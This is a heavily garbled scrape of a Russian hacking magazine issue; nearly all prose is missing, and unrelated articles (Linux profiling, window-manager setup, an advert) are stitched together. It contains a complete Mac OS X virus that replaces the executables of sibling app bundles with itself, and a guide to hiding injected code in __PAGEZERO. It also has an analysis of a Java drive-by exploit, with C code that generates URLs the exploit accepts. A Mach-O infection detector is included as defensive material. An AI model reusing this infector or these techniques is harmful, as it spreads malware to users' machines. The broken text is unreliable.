avtuh.ru/2010/09/27/mail-ruregistrator-4.html. z


MALWARE
seva seva

MAC? , !
Mac OS X? . ,
, ,
. ?
? .

Mac Classic ( , Mac


OS 10-, Mac OS X) :
1984 Mac OS X 2001.
,
, , , nVir, -

068

1987 .

, .
Mac OS,
.
, Apple ,


LC_UNIXTHREAD as shown by otool

Mach- , Mac OS X. a.out.


Mach ( ,
).
NeXTSTEP. Mac OS X,
NeXTSTEP, . , GNU/Hurd,

Figure: Mach-O file layout. The header comes first, then the load commands (segment command 1, segment command 2, ...), then the data: segment 1 with section 1..n data, segment 2 and so on.
Mach-O

Mach, ELF,
Mach-Object.
Mach- - PE,
. , , . , PowerPC Intel.
, .
PowerPC- , Apple ,
.
Intel ,
- PowerBook,
.
Mach-O ( , ,
PE, Microsoft).
Apple. ,
( loader.h),

malware. ,
CD. autorun
Mac OS X ,
-.
, Apple Mac OS X
.
/Applications.
.
, ,
.
, iTunes iMail.
C Apple . , .
-
Mac OS X/iOS
.
, , - jpg- c
Mac OS X . Finder Mac OS X .
,
,
,
.
, , .
, , ,
Ma OS X,
,
.




The infector itself, reassembled from the listing:

#import <Cocoa/Cocoa.h>

int main(int argc, char *argv[])
{
NSLog(@"!!!!!!!!!!!!!!!!!!!!!");
NSLog(@"!!!    Im here    !!!!");
NSLog(@"!!!!!!!!!!!!!!!!!!!!!");
NSFileManager * fm = [NSFileManager defaultManager];
// the bundle we are running from
NSString * bundle_fldr = [[NSBundle mainBundle] bundlePath];
// the folder that holds it, and hopefully other .app bundles
NSString * our_fldr = [bundle_fldr stringByAppendingString: @"/.."];
// our own executable name, from Info.plist
NSString * current_executable =
    [[NSDictionary dictionaryWithContentsOfFile:
        [bundle_fldr stringByAppendingString: @"/Contents/Info.plist"]]
        objectForKey: @"CFBundleExecutable"];
// every .app in that folder :)
NSArray * apps = [[fm directoryContentsAtPath: our_fldr]
    filteredArrayUsingPredicate:
        [NSPredicate predicateWithFormat: @"self ENDSWITH '.app'"]];
for (NSString * app in apps) {
    // a bundle that already has an "old" file has been done before
    if ([fm fileExistsAtPath:
            [our_fldr stringByAppendingFormat: @"/%@/Contents/MacOS/old", app]])
        continue; // already infected
    NSDictionary * plist_dict = [NSDictionary dictionaryWithContentsOfFile:
        [our_fldr stringByAppendingFormat: @"/%@/Contents/Info.plist", app]];
    NSString * app_executable = [plist_dict objectForKey: @"CFBundleExecutable"];
    // move the original executable aside as "old"
    [fm moveItemAtPath:
        [our_fldr stringByAppendingFormat: @"/%@/Contents/MacOS/%@", app, app_executable]
        toPath: [our_fldr stringByAppendingFormat: @"/%@/Contents/MacOS/old", app]
        error: nil];
    // and put a copy of ourselves in its place
    [fm copyItemAtPath:
        [bundle_fldr stringByAppendingFormat: @"/Contents/MacOS/%@", current_executable]
        toPath: [our_fldr stringByAppendingFormat: @"/%@/Contents/MacOS/%@", app, app_executable]
        error: nil];
}
// finally start the original program so that the user notices nothing
system([[[[NSBundle mainBundle] bundlePath]
    stringByAppendingString: @"/Contents/MacOS/old &"] cString]);
return 0;
}

Back to Mach-O. The header is the first thing in the file; on Intel every field is a uint32 in little-endian order. From loader.h:

struct mach_header
{
uint32_t magic;            // Mach-O magic number
cpu_type_t cputype;
cpu_subtype_t cpusubtype;
uint32_t filetype;
uint32_t ncmds;            // number of load commands
uint32_t sizeofcmds;       // total size of the load commands
uint32_t flags;
};

The header is followed by the load commands. The two that matter here are LC_SEGMENT, which describes a segment and its sections, and LC_UNIXTHREAD, which sets the initial register state of the main thread, including the instruction pointer, i.e. the entry point. IDA understands Mach-O load commands as well, although it does not show all of them.

struct segment_command
{
uint32_t cmd;              // command id
uint32_t cmdsize;          // size of the command, id included
char segname[16];          // e.g. __TEXT
uint32_t vmaddr;           // address in VM
uint32_t vmsize;
uint32_t fileoff;          // offset in the file
uint32_t filesize;
vm_prot_t maxprot;
vm_prot_t initprot;
uint32_t nsects;           // number of sections
uint32_t flags;
};
struct section
{
char sectname[16];         // section name
char segname[16];
uint32_t addr;
uint32_t size;
uint32_t offset;           // offset in the file
uint32_t align;
uint32_t reloff;
uint32_t nreloc;
uint32_t flags;
uint32_t reserved1;
uint32_t reserved2;
};

: ,
,

otool ( , ,
). Mach-O ,
, . __TEXT,
__DATA.

Mac OS X still honours LC_UNIXTHREAD, and that is what the injected code relies on. So where in a Mach-O can the code go? The first candidate is the __TEXT segment.

... , .
,
.
, ,
, , , . ,
, .

. , ,
.
Besides __TEXT and __DATA there is __PAGEZERO, the segment mapped at address zero so that NULL dereferences fault. In the file its fileoffset and filesize are zero, nothing is loaded for it, and it is neither readable, writable nor executable. Nothing stops us from changing that: give __PAGEZERO a file offset and size that point at the appended code, set the R and X protection bits, and point the LC_UNIXTHREAD entry at it. The loader will map the page without complaint, and the program will start from our code.
,
BlackHat, . ,
, ,
.
,
. ,
Mach-O , .
, .
(- 4K
),
. , ,
.
:), .
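A check for the two traces the infection leaves, as an added example that is not the article's code: it walks the load commands of a 32-bit Mach-O image held in memory and flags a __PAGEZERO segment with file contents or non-zero protection, and an LC_UNIXTHREAD entry point outside __TEXT. The struct layouts are the ones from <mach-o/loader.h> quoted above, redeclared so this compiles on any platform; the sample image is constructed here and is not a real binary.

```c
#include <stdint.h>
#include <string.h>
#include <stddef.h>

#define MH_MAGIC      0xfeedface
#define LC_SEGMENT    0x1
#define LC_UNIXTHREAD 0x5

struct mach_header {
    uint32_t magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags;
};
struct load_command { uint32_t cmd, cmdsize; };
struct segment_command {
    uint32_t cmd, cmdsize;
    char segname[16];
    uint32_t vmaddr, vmsize, fileoff, filesize;
    uint32_t maxprot, initprot, nsects, flags;
};
/* LC_UNIXTHREAD for i386: flavor, count, then the 16 registers (eip is index 10). */
struct unixthread_i386 { uint32_t cmd, cmdsize, flavor, count, regs[16]; };

/* Bitmask: 1 = __PAGEZERO has file contents, 2 = __PAGEZERO has protection bits,
 * 4 = entry point outside __TEXT; -1 = malformed image. */
int macho_suspicious(const uint8_t *img, size_t len)
{
    if (len < sizeof(struct mach_header)) return -1;
    struct mach_header mh; memcpy(&mh, img, sizeof mh);
    if (mh.magic != MH_MAGIC) return -1;

    size_t off = sizeof mh;
    uint32_t text_start = 0, text_end = 0, eip = 0;
    int have_eip = 0, flags = 0;
    for (uint32_t i = 0; i < mh.ncmds; i++) {
        struct load_command lc;
        if (off + sizeof lc > len) return -1;
        memcpy(&lc, img + off, sizeof lc);
        if (lc.cmdsize < sizeof lc || off + lc.cmdsize > len) return -1;
        if (lc.cmd == LC_SEGMENT && lc.cmdsize >= sizeof(struct segment_command)) {
            struct segment_command sc; memcpy(&sc, img + off, sizeof sc);
            if (strncmp(sc.segname, "__PAGEZERO", 16) == 0) {
                if (sc.fileoff != 0 || sc.filesize != 0) flags |= 1;
                if (sc.initprot != 0 || sc.maxprot != 0) flags |= 2;
            } else if (strncmp(sc.segname, "__TEXT", 16) == 0) {
                text_start = sc.vmaddr; text_end = sc.vmaddr + sc.vmsize;
            }
        } else if (lc.cmd == LC_UNIXTHREAD && lc.cmdsize >= sizeof(struct unixthread_i386)) {
            struct unixthread_i386 ut; memcpy(&ut, img + off, sizeof ut);
            eip = ut.regs[10]; have_eip = 1;
        }
        off += lc.cmdsize;
    }
    if (have_eip && !(eip >= text_start && eip < text_end)) flags |= 4;
    return flags;
}

/* Constructed image: header + __PAGEZERO + __TEXT + LC_UNIXTHREAD, 220 bytes.
 * With infected != 0 the page-zero trick from the text is applied. */
size_t build_sample(uint8_t *out, int infected)
{
    struct mach_header mh = { MH_MAGIC, 7, 3, 2, 3, 0, 0 };
    struct segment_command pz = { LC_SEGMENT, sizeof pz, "__PAGEZERO", 0, 0x1000, 0, 0, 0, 0, 0, 0 };
    struct segment_command tx = { LC_SEGMENT, sizeof tx, "__TEXT", 0x1000, 0x1000, 0, 0x1000, 7, 5, 0, 0 };
    struct unixthread_i386 ut = { LC_UNIXTHREAD, sizeof ut, 1, 16, {0} };
    ut.regs[10] = 0x1F00;            /* entry inside __TEXT */
    if (infected) {                  /* payload appended, mapped at page zero, entry moved there */
        pz.fileoff = 0x2000; pz.filesize = 0x1000; pz.initprot = 5; pz.maxprot = 5;
        ut.regs[10] = 0x100;
    }
    mh.sizeofcmds = sizeof pz + sizeof tx + sizeof ut;
    size_t off = 0;
    memcpy(out + off, &mh, sizeof mh); off += sizeof mh;
    memcpy(out + off, &pz, sizeof pz); off += sizeof pz;
    memcpy(out + off, &tx, sizeof tx); off += sizeof tx;
    memcpy(out + off, &ut, sizeof ut); off += sizeof ut;
    return off;
}

/* Verdict for the clean (0) or infected (1) sample. */
int sample_verdict(int infected)
{
    uint8_t img[256];
    size_t n = build_sample(img, infected);
    return macho_suspicious(img, n);
}
```

On a real file, read it into memory and call macho_suspicious on the buffer; a fat (universal) binary has to be split into its architecture slices first, since the walk starts at the mach_header. Any non-zero result is worth a look with otool -l.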

Mac OS X

, Mac OS X (baundles).
,
,
. Finder , , .
, .app, Contents. Frameworks,
, , . , ( dll)
. MacOS
Mach-O, ( Resources) ,
. Info.plist .
:



...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>Demo</string>
<key>CFBundleIconFile</key>
<string></string>
....
<key>NSMainNibFile</key>
<string>MainMenu</string>
<key>NSPrincipalClass</key>
<string>NSApplication</string>
</dict>
</plist>

xml-,
. Mac OS X
.
CFBundleExecutable.
MacOS. . , - ,
. ,
CFBundleExecutable, , ,
. -,


. ,
/Applications , ,
, Mac OS X!
, , AuthorizationCreate Security-.
, , Mac OS X
Apple , ,
.

,

.
: ,
, ,
old, , , .

.

Outro

, ,
, .
Mac OS X , ,
*nix-,
Mac OS X
. ! z


MALWARE
Senior Malware Analyst, Heuristic detection group, Kaspersky Lab

Java

JAVA-
PE,
,
Java. Java?

, , . ,
.
? drive-by. , drive-by ,

, . , . ,
, . , -, - ,
,
.
Java
.

Java, , CVE-2009-3867. ,
, .
JavaScript Java. -,
JRE
, .
. html , html-.
Java, <applet>
<object>. archive
( jar) code (
-, ). html
<PARAM>. ,
, , data, .



. 1 , Java

. 2 AdgredY.class
.
:
archive='tmp/pul.jar'
code='dev.s.AdgredY'
<param name='data' VALUE='http://****.com/s4/l.php?...'>
, jar . ?
Java? jar
ZIP-, .
, .
class. ,
Java-.
, . AdgredY.class, , code
<applet> . ,
, dev.s.AdgredY, AdgredY. , . , , , , ,
.
.class , , , . Java JAD.
, ,
(, , , , ).
AdgredY.class, , , .
Hiew, ,

.
-, ,
! ,
A000CA469F , mov al, [0x9F46CA00].
Windows .
, .
,
Java NetBeans
. ,

. ,
. , .
, , .
s2, s4, s8 .
s3 , .


. 3 AdgredY.class

, , s5 s3
,
reverse. , atad data (
! ! .
.). .
, .
.
,
, s21, s25 .
, ,
getParameter data . ,
, ,
<PARAM> html-. .
, url.
: http://********.com/s4/l.
php?deserialize=ee&i=. , php, ,
: deserialize, ee
i. ,
deserialize. :
String s27 = getParameter(data);
char ac[] = {?};            // the delimiter; the decompiler did not render the literal
int i = 0;
int j = 0;
for(; s27.charAt(i) != ac[0]; i++)
    j += s27.charAt(i);     // sum of the character codes up to the delimiter
j += 7;
j %= 256;
String s28 = Integer.toHexString(j);
if(s27.indexOf((new StringBuilder()).append("deserialize=").append(s28).toString()) == -1)
    return;

, ?
,
.
.
Java, -. , -
, URL,
, .
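The check rebuilt in C, as an added example that is not the analysed applet's code: it computes the token the applet expects for a given data URL and tells whether a URL would pass, so an analyst can see why a page fetched out of context does nothing and can build a URL that the applet accepts. It assumes the delimiter the decompiler left as {?} is the '?' of the query string, which is consistent with the l.php?deserialize=... URL above; the sample URL is constructed, the real one is masked in the article.

```c
#include <stdio.h>
#include <string.h>

/* The decompiled loop: sum the character codes of the URL up to (not
 * including) the first delimiter, add 7, reduce modulo 256. The applet
 * would throw if the delimiter is missing; here the sum just runs to the end. */
unsigned expected_token(const char *url, char delim)
{
    unsigned j = 0;
    for (const char *p = url; *p && *p != delim; p++)
        j += (unsigned char)*p;
    j += 7;
    return j % 256;
}

/* Mirrors: if (s27.indexOf("deserialize=" + Integer.toHexString(j)) == -1) return;
 * Integer.toHexString prints lowercase hex without zero padding. */
int url_passes_check(const char *url)
{
    char needle[32];
    snprintf(needle, sizeof needle, "deserialize=%x", expected_token(url, '?'));
    return strstr(url, needle) != NULL;
}

/* Build a URL the applet accepts for a given base; this is what the
 * server-side script that emits the <param> has to do. */
char *make_accepted_url(const char *base, char *out, size_t n)
{
    snprintf(out, n, "%s?deserialize=%x&i=", base, expected_token(base, '?'));
    return out;
}

/* Does the generated URL for base pass the applet's own check? */
int roundtrip_ok(const char *base)
{
    char url[256];
    make_accepted_url(base, url, sizeof url);
    return url_passes_check(url);
}
```

Because the token depends only on the part of the URL before the '?', it stays constant for a given hosting path: once computed, the same deserialize value works for every victim, which is why the check is a hurdle for automated crawlers rather than for a person.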


. 4 AdgredY.class,

. 5 goat-, , Java-
, i .
getSoundBank.

(. . 4).
Java System.
getProperty (java.version). url, , -

Zeus



()
Z%Z%Z%Z%Z%Z%. !
!.
getSoundBank ,
.
,
. ,
. ,
url, data <PARAM>.
C,
.
IDA, goat-. (.
5) , .
,
url, .

URLDownloadToFile WinExec.
.
PEB kernel32.
LoadLibraryA
GetProcAddress,
urlmon.dll GetTempPathA, WinExec, URLDownloadToFileA.
,
. , , ,
.
PoC, ,
.
, .
-,
? , Java , .
,
html- .

Java. ,
, .
, ,
drive-by. , ,
, .
url .
, , , .
getSoundBank .
-, ,
. , pdf, javascript . ,
Windows Adobe, Java. z



Mifrill (mifrill@real.xakep.ru)

IT- .
,
.
- . , ,
. , , !

, , ,
! ,
,
, ,
.
, , .
, .
, :
?, ,
?
,
. , ,
.

.
? ,
,

, .
,
, ,
, iDefense,
SnoSoft VUPEN.
, , -


, .
, IE,
?
$5 000 $250 000,
: ,
,
.
, , ,
,
, ,
,
.
.
, , .
? , ,
-
.
, .
,
.
,
. ,
. , ,
, Mozilla
$3 000 Firefox,

Google
Chrome $3
133.70 (1337 elite,
).
PR-, .
, ,
.
, .

,
,
,
. ,

, ,
.
, ,

, Zero Day Initiative
(zerodayinitiative.com) Tripping Point,
Snosoft program (snosoft.blogspot.com)
iDefense Vulnerability Contributor
Program.
,
. ,

.
,
, -
-,
.


.
,
: ,
, ,


. .


iDefense

, :
.
,

, ,
.


, , , .
,
.
,
,
,
. .



.
,
IT-.


,
:)

. -
, ,
. . .

,
-.

iDefense. -
:). ,

-
. , .
? . , , ,
,
, .



,
,

EBay
, , .
,
-
- . ,
,
. ,

, , ,
.

-
,
. .
,
wasm.ru antichat.ru.

,
.
,
$200-350 ,
.
,
,

.
,

, . , , ,
, . ,

,

. ,

.

, ,
?
.
, ,
, , .
.
, , .
, ,
.
, :
, IPS (Intrusion
Prevention System)



, Zero Day Initiative


,
. ,
, ,
.
100 000 ?
100 000
, , -
. -,
, .

Immunity, Core Security Rapid7,
, ,
. ,

, . ,
,
.
, ,
. :
IPS , IPS
. ,
,
.
secure-
.

,

-.
. -

. .
,
,
,
.
, ,
. ,
Microsoft,
? , MS
- ,
, ,
-, , ,
, . ,
( ,
)
, . : - ,
-
-, , ,

.

. ,
.

-

,
.
,
. , ,
.
?
,

. , ,
.
.
,
.
Mozilla Google PR, ,
.
, ,
. ,

, ,
,
.
, , . , , ,

:). z


UNIXOID
zobni n@gmail.com


: 20% 80% .

, : ,
,
20%
, .
20% .
. ,
,

,
, - .
(,
,
), ,
,


.
( ,
),
,
.

GNU Profiler ( gprof).
,
GCC.
GNU Coverage testing tool (gcov),
.


Google Performance Tools ( GPT). Valgrind,

,

. ,
, .

GNU Profiler

GNU Profiler (gprof)


,

INFO

gprof needs a libc built with profiling support: install libc6-prof and link against libc_p with export LDFLAGS='-lc_p'.

GPT is controlled through the CPUPROFILE environment variable, or from the code with ProfilerStart() and ProfilerStop() from google/profiler.h.

Fig. 1: the flat profile produced by gprof
Fig. 2: the gprof call graph

gprof is the classic profiler of the UNIX world. It is tied to gcc, so it works with every language gcc compiles (C/C++, Objective-C, Ada, Java). The program is built with '-pg', which makes gcc instrument every function (call counting) and arranges for the collected samples to be written to a file when the program exits. Let us take gzip as the guinea pig:

$ wget www.gzip.org/gzip-1.3.3.tar.gz
$ tar -xzf gzip-1.3.3.tar.gz
$ cd gzip-1.3.3

A compiler and the build tools are needed (on Ubuntu the build-essential package):

$ sudo apt-get install build-essential

then configure with the profiling flag in CFLAGS and build:

$ CFLAGS='-pg' ./configure
$ make
gzip, .

After a run, gmon.out appears in the current directory:

$ ./gzip ~/ubuntu-10.10-desktop-i386.iso
$ ls -l gmon.out
-rw-r--r-- 1 j1m j1m 24406 2010-11-19 14:47 gmon.out

The report is produced from the binary and gmon.out:

$ gprof ./gzip gmon.out > gzip-profile.txt

WARNING
GPT loaded through LD_PRELOAD is ignored for SUID binaries; profile those some other way.

1. The flat profile (Fig. 1) lists the functions with the share of run time, the absolute time and the number of calls for each, sorted by share. In gzip the leader is deflate, with 29% of the time, no surprise: it is the main compression routine. Next is longest_match with 22%: it is called from deflate 450 613 081 times and is the classic optimisation target, a small function called very often. fill_window takes 13% with 22 180 calls.

Fig. 3: gcov output

2. The call graph (Fig. 2) shows, for every function, which functions called it (the lines above it) and which it called (the lines below it), with the time attributed to each. The columns are: index (the function's number in the table), % time, self (time in the function itself), children (time in its callees), called (number of calls) and name. With the call graph it is easy to see not just which function is slow but who calls it and how often, which is what one needs in order to decide where to optimise.
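As an added example (not from the article), a small reader for the flat-profile table gprof prints first, so the hot spots discussed above can be pulled out of captured output by a script instead of by eye: it parses the rows, reports the hottest function and the share of time the top k rows account for (the 80/20 check). The sample report is constructed to match the gzip figures quoted above; it is not pasted from a real run.

```c
#include <stdio.h>
#include <string.h>

struct hot {
    char name[64];
    double pct;       /* "% time" column */
    double self_sec;  /* "self seconds" column */
    long calls;       /* "calls" column, 0 when gprof prints none */
};

/* Parse one data row of the flat profile. gprof prints
 *   %time cumulative self calls self-ms/call total-ms/call name
 * and omits the last three numbers for functions it could not count, so
 * both shapes are accepted. Header and blank lines fail and return 0. */
int parse_flat_row(const char *line, struct hot *h)
{
    double cum, a, b;
    if (sscanf(line, "%lf %lf %lf %ld %lf %lf %63s",
               &h->pct, &cum, &h->self_sec, &h->calls, &a, &b, h->name) == 7)
        return 1;
    if (sscanf(line, "%lf %lf %lf %63s", &h->pct, &cum, &h->self_sec, h->name) == 4) {
        h->calls = 0;
        return 1;
    }
    return 0;
}

/* Scan a captured report, keeping up to max rows; returns how many parsed. */
int parse_flat_profile(const char *text, struct hot *out, int max)
{
    int n = 0;
    const char *p = text;
    while (*p && n < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len < sizeof line) {
            memcpy(line, p, len);
            line[len] = '\0';
            if (parse_flat_row(line, &out[n]))
                n++;
        }
        if (!nl)
            break;
        p = nl + 1;
    }
    return n;
}

int row_count(const char *text)
{
    struct hot rows[64];
    return parse_flat_profile(text, rows, 64);
}

/* Name of the function with the largest share of self time, "" if none. */
const char *hottest(const char *text)
{
    static struct hot rows[64];
    int n = parse_flat_profile(text, rows, 64), best = -1;
    for (int i = 0; i < n; i++)
        if (best < 0 || rows[i].pct > rows[best].pct)
            best = i;
    return best < 0 ? "" : rows[best].name;
}

/* Share of run time covered by the first k rows (gprof sorts them by share). */
double top_share(const char *text, int k)
{
    struct hot rows[64];
    int n = parse_flat_profile(text, rows, 64);
    double s = 0;
    for (int i = 0; i < n && i < k; i++)
        s += rows[i].pct;
    return s;
}

/* Constructed sample shaped like gprof's table, with the gzip figures from the text. */
const char SAMPLE_FLAT[] =
    "Flat profile:\n"
    "\n"
    "Each sample counts as 0.01 seconds.\n"
    "  %   cumulative   self              self     total\n"
    " time   seconds   seconds    calls  ms/call  ms/call  name\n"
    " 29.00      4.21     4.21         1  4210.00  9290.00  deflate\n"
    " 22.00      7.40     3.19 450613081     0.00     0.00  longest_match\n"
    " 13.00      9.29     1.89     22180     0.09     0.09  fill_window\n"
    "  0.50      9.36     0.07                             main\n";
```

Feed it the first section of gzip-profile.txt (everything up to the call graph); top_share(text, 3) on the numbers above gives 64%, three functions out of dozens, which is the 20/80 distribution the introduction talks about.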

GNU Coverage testing tool

gprof, GCC
,
.
gcov ,
.

, , , ,
(, ,

). Gcov , -


Instead of '-pg', gcov needs '-fprofile-arcs' and '-ftest-coverage':
$ CFLAGS='-fprofile-arcs -ftest-coverage' ./configure && make

:
$ ./gzip ~/ubuntu-10.10-desktop-i386.iso

,
:
$ gcov deflate.c
File 'deflate.c'
Lines executed:76.98% of 139
deflate.c:creating 'deflate.c.gcov'

The .gcov file is the source annotated with the execution count of every line in the left column; lines that never ran are marked #####.

Google Performance Tools

Google Performance Tools ( GPT)


Google,
. gprof, GPT

,
POSIX- gettimeofday() , ,
, ,
. .


.4 , GPT, gprof

.

, ,
.
: tcmalloc
(, GPT,
malloc,
, ,
) profiler, ,
gprof. pprof, .
, rpm- deb-
(code.google.com/p/googleperftools), , Fedora
Ubuntu, :
$ sudo apt-get install google-perftools \
libgoogle-perftools0 libgoogle-perftools-dev

. ,
LD_PRELOAD:
$ LD_PRELOAD=/usr/lib/libprofiler.so.0.0.0 \
CPUPROFILE=gzip-profile.log ./gzip \
/home/j1m/ubuntu-10.10-desktop-i386.iso

(
- , C++),
. , .
gzip , :
$ cd ~/gzip-1.3.3
$ make clean

$ ./configure
$ LDFLAGS='-lprofiler' ./configure && make

gzip ,
. , CPUPROFILE
:
$ CPUPROFILE=gzip-cpu-profile.log ./gzip \
~/ubuntu-10.10-desktop-i386.iso
PROFILE: interrupts/evictions/bytes = 4696/946/91976

gprof,

. GPT perl- pprof ( Ubuntu
google-pprof),
gcov,
. 11 ,
:
1. (--text) , gprof;
2. Callgrind (--callgrind) , kcachegrind ( valgrind);
3. (--gv) ,
;
4. (--list=<regexp>)
;
5. (--disasm=<regexp>) ;
6. (--symbols)
;
7. (--dot, --ps, --pdf, --gif) ,
;
8. (--raw) ( ).
('--text')
('--gv') .

ADEPT ADEPTG@GMAIL.COM

.5 , GPT,

. :
$ google-pprof --text ./gzip gzip-cpu-profile.log

4,
.
, gprof, . , GPT

, , .

( , '-pg'), GPT
, .
,
, , .

. pprof ,
, .
, ,
. , ,
.
gprof: , . :
1. ;
2. ;
3. ;
4. ;
5. ;
6. .

, , gprof, pprof, ,


. , GPT
CPUPROFILE_FREQUENCY,
, , (,

).
GPT gprof
.
pprof '--gv' (,
):
$ google-pprof --gv ./gzip gzip-cpu-profile.log


, ,
gprof.
, , .
,
( ).
, ,

. GPT , .
,
pprof .
( '--lines'), ('--files')
('--addresses'). GPT
,
, , ,
.

.6 Valgrind callgrind
. , GPT
, ,

.

tcmalloc, HEAPPROFILE . :
$ LD_PRELOAD=/usr/lib/libtcmalloc.so.0.0.0 \
HEAPPROFILE=gzip-heap-profile.log \
./gzip ~/ubuntu-10.10-desktop-i386.iso
Starting tracking the heap
Dumping heap profile to gzip-heap-profile.log.0001.
heap (Exiting)

,
,
. :
1. Cachegrind

( ,
).
2. Massif , GPT.
3. Callgrind , gprof GPT.
Valgrind
memcheck ( ),
.
:

0000.heap.
pprof '--text',

. ,
, ,


.
, .
,
HEAP_PROFILE_MMAP.
mmap (
GPT malloc,
calloc, realloc new).

callgrind.out.PID,
callgrind_annotate kcachegrind
( ). (
man-), , callgrind_annotate
'--auto',
.
Valgrind '--tool=massif'.
massif.out.PID-,
ms_print.
pprof, , ascii-art .

Valgrind

Valgrind .
Valgrind ,
,
.

$ valgrind --tool=callgrind ./program

, gprof, gcov GPT,



,
Valgrind,
.


UNIXOID
zobnin@gmail.com


Linux
.
, ,
, .


(DM), ,
DE.
DM
, KDE Gnome,

.
SLiM (Simple LogIn Manager).
SLiM Ubuntu,
apt-. -


SLiM
. - ,

. /etc/slim.conf,
default_path
( ):
:/sbin:/usr/sbin:/usr/local/sbin

DE. sessions
"default,awesome,xterm".
: , awesome xterm
( WM).

slim,

INFO

info




,

(

)

.

. ,
, : ,
, , ,
freedesktop, .

. Fluxbox, windowmaker, kwm, compiz
WM
,
Xerox.
, (
)
.
, ,
( tail , ).
, , -
.
WM, (, ratpoison dwm),
(ion3, awesome). , kwm ( KDE 4.5).

awesome. , , ,
, awesome
, (
)
. ,
awesome Ubuntu,
apt-get:
$ sudo apt-get install awesome awesome-extra

awesome-extra
awesome, ,
.

UNIX-
, .

, mc,
xterm .
,

rxvt-unicode. , , .
, ,
.
terminus,
UNIX-.
, (
)
:
$ sudo apt-get install rxvt-unicode \
xfonts-terminus
$ sudo apt-get remove xterm gnome-terminal

~/.Xdefaults :
$ vi ~/.Xdefaults
! xterm
URxvt*termName: xterm
!
URxvt*background: #e0e0ac
!
URxvt*foreground: Black
!
URxvt*scrollBar: false
!

URxvt*internalBorder: 5
!
URxvt.font: xft:Terminus:size=14

.
, ,
.

, , .
Ubuntu
NetworkManager, DE


uzbl


,

fl (fl*
).



, ,


.
uzbl

,


www.
uzbl.org/wiki/scripts.

GTK-


gtktheme-switch
(

gtk2-engines-*).

HTTP://WWW
awesome.naquadah.
org/wiki/User_Contributed_Widgets

awesome;
awesome.naquadah.
org/wiki/Beautiful_themes
awesome.



, , .
wicd,
, . , NetworkManager:
$ sudo apt-get remove network-manager
$ sudo apt-get install wicd wicd-curses wicd-cli
wicd ,
.

,
.
, .
slim. <F1> (
awesome), . awesome
( ).
. -,
( , awesome
). ,
WM.
, <Win+W>.
1 9,
, WM.
<Win+>.
(


), , (
, ).
-, ().
:
1. ;
2. (, <Win+Enter>
);
3. , <Win+R> (
<Alt+F2> WM, -,
, ).
( ) <Win+J> (), <Win+K> ()
<Win+Tab> ( ).
awesome ,
. <Win+>,
: ,
.
,
, . Awesome ,

- ( , ),
<Win+>
() <Win+Shift+> ().
,
. ,
:
1. . .
,
<Win+ >,
<Alt+ >
. (
gimp) , .
2. , . ,
( top,
bash, irc- ).
3. . , (
). ,
: , mail-, ,
.


<Win+N>, <Win+M>, , <Win+Ctrl+>
<Win+Shift+C>.
<Win+H> () <Win+L> ().
,
awesome, ,
, .
awesome lua,
,
( lua
). lua
( JavaScript),

.
.
.
require, lua-.
require(vicious), vicious,
( awesome -, - ).

beautiful.init. ,
,
( awesome
/usr/share/awesome/themes/).
,
, , modkey ( ,
awesome
Win, Mod4). , ,
, -, ,
(,
<Ctrl+Q>, )
. ,
, ,
: . - :
/ ( Wi-Fi), , ,
(, , ). ,
, (
, ).
, -- {{{ Rules, .
,
. , ,
audacious ,
, WM,
( ):
{ rule = { class = "Audacious2" },
properties = { floating = true } },
( Audacious2) ,
xprop | grep WM_CLASS
.
.
( wicd), ( DE,
) (
DE).
. ,

awesome
, ~/.xsession,
'&'.
, ~/.xsession :
$ vi ~/.xsession
# Wicd
wicd-client &
# - CAPSLOCK
#
setxkbmap "us,ru" ",winkeys" "grp:caps_toggle" &
# WM
exec awesome


halevt, .
.xsession (
pgrep halevt >> /dev/null || halevt & exec awesome)
:
$ sudo rm /etc/rc{2,3,4,5}.d/S20halevt
sync, .
/media/- ( /media/disk, ).

,
, -.
UNIX ,

.
, . uzbl ( usable ) -,
UNIX, , ,
. -, uzbl
,
: uzbl-core ( WebKit), uzbl-cookie-daemon cookie, uzbl-browser , uzbl-tabbed
.
.
- , .
,
,
.
Vim,
, , uzbl.
: uzbl


awesome
(
uzbl-tabbed):
uzbl:
gn
go
gC
g<
g>
gt
gT
gi

uzbl , Acid3

. , <r>
, <o> .

<Ctrl>, : , -
- , <i>,
, ,
. <Esc>.
,
.
:
uzbl:
h j k l (, , ,
)
<<
>>
+
1 2
/ ? (, )
n N (, )
S
r

, :
uzbl:
o (
URL)
O ,
p ,
gg google
b
n


, uzbl , .
<Ctrl+b>, ,
. , <u>,
<Tab> ( dmenu,
suckless-tools). <U>
.
<Z>.
.config/uzbl/config, (, ,
, awesome ). , .

, ,
, .
.
, :
rox-filer ,
(
Thunar XFCE);
(g)vim -, (, emacs);
abiword ( docs.google.com);
zathura PDF- vim (
evince);
mplayer , , ( ,
);
audacious2 (
awesome ,
);
mutt mail- (
,
gmail);
mcabber jabber- ( ,
tkabber);
feh ;
scrot ;
burn , (
xfburn XFCE).

WEXLER.HOME 903

>> coding


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

UNIXOID
Adept adeptg@gmail.com


GNU/Linux

GNU/Linux ,

.
Kernel

, ,
( , ,
). Linux
. ,
. , , -


,
RDS (Reliable Datagram Sockets),
,
root
(CVE-2010-3904). RDS

( , )

InfiniBand.
Oracle
, , .
,
. ,

- Ac1db1tch3z

RDS-

RDS (CONFIG_RDS=m).
RDS:
2.6.30 2.6.35.
, Virtual Security
Research ,
, (15 2010),
(19 ) , : www.vsecurity.
com/download/tools/linux-rds-exploit.c.
.
Ubuntu (9.10, 10.04 10.10) 19 .
RedHat 25
( ). Debian Lenny
